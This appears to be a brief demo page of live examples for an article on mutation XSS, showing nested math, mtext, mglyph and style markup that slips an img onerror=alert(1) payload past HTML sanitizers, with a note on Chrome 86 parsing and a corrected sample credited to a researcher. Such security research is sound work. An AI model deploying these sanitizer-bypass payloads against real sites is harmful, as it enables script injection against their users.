Live examples for an excellent article.
Editable input:
<form><math><mtext></form><form><mglyph><style></math><img src onerror=alert(1)>
Input is harmless :
Alerts when sanitized :
In <iframe> with :
And with :
Note: Chrome 86 parse content differently in <iframe>.
Check out sample by Sapra @pwntheweb (the one in article contains an error, fixed):
<math><mtext><table><mglyph><style><math><table id="</table>"><img src onerror=alert(1)>